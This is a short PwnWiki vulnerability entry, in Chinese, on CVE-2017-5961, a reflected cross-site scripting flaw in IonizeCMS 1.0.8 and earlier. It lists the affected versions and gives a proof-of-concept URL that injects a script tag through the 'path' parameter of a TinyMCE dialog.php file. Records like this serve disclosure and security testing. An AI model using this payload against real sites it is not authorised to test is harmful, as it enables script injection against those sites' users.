CVE-2017-5961 IonizeCMS XSS漏洞

From PwnWiki
This page is a translated version of the page CVE-2017-5961 IonizeCMS XSS漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

<=Ionize 1.0.8

POC

http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinymce/jscripts/tiny_mce/plugins/codemirror/dialog.php?path=%22%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%20%22
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-5961_IonizeCMS_XSS漏洞/zh-cn&oldid=7042"